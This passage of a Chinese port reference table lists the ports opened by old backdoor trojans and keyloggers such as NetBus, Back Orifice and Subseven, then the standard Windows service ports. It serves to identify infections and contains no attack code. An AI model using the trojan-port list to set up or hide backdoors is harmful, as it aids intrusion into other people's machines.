说明:Sygate服务器端。
端口:7626
服务:[NULL]
说明:木马Giscier开放此端口。
端口:7789
服务:[NULL]
说明:木马ICKiller开放此端口。
端口:8000
服务:OICQ
说明:腾讯QQ服务器端开放此端口。
端口:8010
服务:Wingate
说明:Wingate代理开放此端口。
端口:8080
服务:代理端口
说明:WWW代理开放此端口。
端口:9400、9401、9402
服务:[NULL]
说明:木马Incommand 1.0开放此端口。
端口:9872、9873、9874、9875、10067、10167
服务:[NULL]
说明:木马Portal of Doom开放此端口。
端口:9989
服务:[NULL]
说明:木马iNi-Killer开放此端口。
端口:11000
服务:[NULL]
说明:木马SennaSpy开放此端口。
端口:11223
服务:[NULL]
说明:木马Progenic trojan开放此端口。
端口:12076、61466
服务:[NULL]
说明:木马Telecommando开放此端口。
端口:12223
服务:[NULL]
说明:木马Hack'99 KeyLogger开放此端口。
端口:12345、12346
服务:[NULL]
说明:木马NetBus1.60/1.70、GabanBus开放此端口。
端口:12361
服务:[NULL]
说明:木马Whack-a-mole开放此端口。
端口:13223
服务:PowWow
说明:PowWow是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有攻击性。它会驻扎在这个TCP端口等回应。造成类似心跳间隔的连接请求。如果一个拨号用户从另一个聊天者手中继承了IP地址就会发生好象有很多不同的人在测试这个端口的情况。这一协议使用OPNG作为其连接请求的前4个字节。
端口:16969
服务:[NULL]
说明:木马Priority开放此端口。
端口:17027
服务:Conducent
说明:这是一个外向连接。这是由于公司内部有人安装了带有Conducent"adbot"的共享软件。Conducent"adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。
端口:19191
服务:[NULL]
说明:木马蓝色火焰开放此端口。
端口:20000、20001
服务:[NULL]
说明:木马Millennium开放此端口。
端口:20034
服务:[NULL]
说明:木马NetBus Pro开放此端口。
端口:21554
服务:[NULL]
说明:木马GirlFriend开放此端口。
端口:22222
服务:[NULL]
说明:木马Prosiak开放此端口。
端口:23456
服务:[NULL]
说明:木马Evil FTP、Ugly FTP开放此端口。
端口:26274、47262
服务:[NULL]
说明:木马Delta开放此端口。
端口:27374
服务:[NULL]
说明:木马Subseven 2.1开放此端口。
端口:30100
服务:[NULL]
说明:木马NetSphere开放此端口。
端口:30303
服务:[NULL]
说明:木马Socket23开放此端口。
端口:30999
服务:[NULL]
说明:木马Kuang开放此端口。
端口:31337、31338
服务:[NULL]
说明:木马BO(Back Orifice)开放此端口。另外木马DeepBO也开放31338端口。
端口:31339
服务:[NULL]
说明:木马NetSpy DK开放此端口。
端口:31666
服务:[NULL]
说明:木马BOWhack开放此端口。
端口:33333
服务:[NULL]
说明:木马Prosiak开放此端口。
端口:34324
服务:[NULL]
说明:木马Tiny Telnet Server、BigGluck、TN开放此端口。
端口:40412
服务:[NULL]
说明:木马The Spy开放此端口。
端口:40421、40422、40423、40426、
服务:[NULL]
说明:木马Masters Paradise开放此端口。
端口:43210、54321
服务:[NULL]
说明:木马SchoolBus 1.0/2.0开放此端口。
端口:44445
服务:[NULL]
说明:木马Happypig开放此端口。
端口:50766
服务:[NULL]
说明:木马Fore开放此端口。
端口:53001
服务:[NULL]
说明:木马Remote Windows Shutdown开放此端口。
端口:65000
服务:[NULL]
说明:木马Devil 1.03开放此端口。
P>下面是:系统常用的端口</P><P>7 TCP Echo 简单 TCP/IP 服务
7 UDP Echo 简单 TCP/IP 服务
9 TCP Discard 简单 TCP/IP 服务
9 UDP Discard 简单 TCP/IP 服务
13 TCP Daytime 简单 TCP/IP 服务
13 UDP Daytime 简单 TCP/IP 服务
17 TCP Quotd 简单 TCP/IP 服务
17 UDP Quotd 简单 TCP/IP 服务
19 TCP Chargen 简单 TCP/IP 服务
19 UDP Chargen 简单 TCP/IP 服务
20 TCP FTP 默认数据 FTP 发布服务
21 TCP FTP 控制 FTP 发布服务
21 TCP FTP 控制 应用层网关服务
23 TCP Telnet Telnet
25 TCP SMTP 简单邮件传输协议
25 UDP SMTP 简单邮件传输协议
25 TCP SMTP Exchange Server
25 UDP SMTP Exchange Server
42 TCP WINS 复制 Windows Internet 名称服务
42 UDP WINS 复制 Windows Internet 名称服务
53 TCP DNS DNS 服务器
53 UDP DNS DNS 服务器
53 TCP DNS Internet 连接_blank">防火墙/Internet 连接共享
53 UDP DNS Internet 连接_blank">防火墙/Internet 连接共享
67 UDP DHCP 服务器 DHCP 服务器
67 UDP DHCP 服务器 Internet 连接_blank">防火墙/Internet 连接共享
69 UDP TFTP 普通 FTP 后台程序服务
80 TCP HTTP Windows 媒体服务
80 TCP HTTP 万维网发布服务
80 TCP HTTP SharePoint Portal Server
88 TCP Kerberos Kerberos 密钥分发中心
88 UDP Kerberos Kerberos 密钥分发中心
102 TCP X.400 Microsoft Exchange MTA 堆栈
110 TCP POP3 Microsoft POP3 服务
110 TCP POP3 Exchange Server
119 TCP NNTP 网络新闻传输协议
123 UDP NTP Windows Time
123 UDP SNTP Windows Time
135 TCP RPC 消息队列
135 TCP RPC 远程过程调用
135 TCP RPC Exchange Server
137 TCP NetBIOS 名称解析 计算机浏览器
137 UDP NetBIOS 名称解析 计算机浏览器
137 TCP NetBIOS 名称解析 Server
137 UDP NetBIOS 名称解析 Server
137 TCP NetBIOS 名称解析 Windows Internet 名称服务
137 UDP NetBIOS 名称解析 Windows Internet 名称服务
137 TCP NetBIOS 名称解析 Net Logon
137 UDP NetBIOS 名称解析 Net Logon
137 TCP NetBIOS 名称解析 Systems Management Server 2.0
137 UDP NetBIOS 名称解析 Systems Management Server 2.0
138 UDP NetBIOS 数据报服务 计算机浏览器
138 UDP NetBIOS 数据报服务 信使
138 UDP NetBIOS 数据报服务 服务器
138 UDP NetBIOS 数据报服务 Net Logon
138 UDP NetBIOS 数据报服务 分布式文件系统
138 UDP NetBIOS 数据报服务 Systems Management Server 2.0
138 UDP NetBIOS 数据报服务 许可证记录服务
139 TCP NetBIOS 会话服务 计算机浏览器
139 TCP NetBIOS 会话服务 传真服务
139 TCP NetBIOS 会话服务 性能日志和警报
139 TCP NetBIOS 会话服务 后台打印程序
139 TCP NetBIOS 会话服务 服务器
139 TCP NetBIOS 会话服务 Net Logon
139 TCP NetBIOS 会话服务 远程过程调用定位器
139 TCP NetBIOS 会话服务 分布式文件系统
139 TCP NetBIOS 会话服务 Systems Management Server 2.0
139 TCP NetBIOS 会话服务 许可证记录服务
143 TCP IMAP Exchange Server
161 UDP SNMP SNMP 服务
162 UDP SNMP 陷阱出站 SNMP 陷阱服务
389 TCP LDAP 服务器 本地安全机构
389 UDP LDAP 服务器 本地安全机构
389 TCP LDAP 服务器 分布式文件系统
389 UDP LDAP 服务器 分布式文件系统
443 TCP HTTPS HTTP SSL
443 TCP HTTPS 万维网发布服务
443 TCP HTTPS SharePoint Portal Server
445 TCP SMB 传真服务
445 UDP SMB 传真服务
445 TCP SMB 后台打印程序
445 UDP SMB 后台打印程序
445 TCP SMB 服务器
445 UDP SMB 服务器
445 TCP SMB 远程过程调用定位器
445 UDP SMB 远程过程调用定位器
445 TCP SMB 分布式文件系统
445 UDP SMB 分布式文件系统
445 TCP SMB 许可证记录服务
445 UDP SMB 许可证记录服务
500 UDP IPSec ISAKMP IPSec 服务
515 TCP LPD TCP/IP 打印服务器
548 TCP Macintosh 文件服务器 Macintosh 文件服务器
554 TCP RTSP Windows 媒体服务
563 TCP NNTP over SSL 网络新闻传输协议
593 TCP RPC over HTTP 远程过程调用
593 TCP RPC over HTTP Exchange Server
636 TCP LDAP SSL 本地安全机构
636 UDP LDAP SSL 本地安全机构
993 TCP IMAP over SSL Exchange Server
995 TCP POP3 over SSL Exchange Server
1270 TCP MOM-Encrypted Microsoft Operations Manager 2000
1433 TCP SQL over TCP Microsoft SQL Server
1433 TCP SQL over TCP MSSQL$UDDI
1434 UDP SQL Probe Microsoft SQL Server
1434 UDP SQL Probe MSSQL$UDDI
1645 UDP 旧式 RADIUS Internet 身份验证服务
1646 UDP 旧式 RADIUS Internet 身份验证服务
1701 UDP L2TP 路由和远程访问
1723 TCP PPTP 路由和远程访问
1755 TCP MMS Windows 媒体服务
1755 UDP MMS Windows 媒体服务
1801 TCP MSMQ 消息队列
1801 UDP MSMQ 消息队列
1812 UDP RADIUS 身份验证 Internet 身份验证服务
1813 UDP RADIUS 计帐 Internet 身份验证服务
1900 UDP SSDP SSDP 发现服务
2101 TCP MSMQ-DC 消息队列
2103 TCP MSMQ-RPC 消息队列
2105 TCP MSMQ-RPC 消息队列
2107 TCP MSMQ-Mgmt 消息队列
2393 TCP OLAP Services 7.0 SQL Server:下层 OLAP 客户端支持
2394 TCP OLAP Services 7.0 SQL Server:下层 OLAP 客户端支持
2460 UDP MS Theater Windows 媒体服务
2535 UDP MADCAP DHCP 服务器
2701 TCP SMS 远程控制(控件) SMS 远程控制代理
2701 UDP SMS 远程控制(控件) SMS 远程控制代理
2702 TCP SMS 远程控制(数据) SMS 远程控制代理
2702 UDP SMS 远程控制(数据) SMS 远程控制代理
2703 TCP SMS 远程聊天 SMS 远程控制代理
2703 UPD SMS 远程聊天 SMS 远程控制代理
2704 TCP SMS 远程文件传输 SMS 远程控制代理
2704 UDP SMS 远程文件传输 SMS 远程控制代理
2725 TCP SQL 分析服务 SQL 分析服务器
2869 TCP UPNP 通用即插即用设备主机
2869 TCP SSDP 事件通知 SSDP 发现服务
3268 TCP 全局编录服务器 本地安全机构
3269 TCP 全局编录服务器 本地安全机构
3343 UDP 集群服务 集群服务
3389 TCP 终端服务 NetMeeting 远程桌面共享
3389 TCP 终端服务 终端服务
3527 UDP MSMQ-Ping 消息队列
4011 UDP BINL 远程安装
4500 UDP NAT-T 路由和远程访问
5000 TCP SSDP 旧事件通知 SSDP 发现服务
5004 UDP RTP Windows 媒体服务
5005 UDP RTCP Windows 媒体服务
42424 TCP ASP.Net 会话状态 ASP.NET 状态服务
51515 TCP MOM-Clear Microsoft Operations Manager 2000 |
|
| |
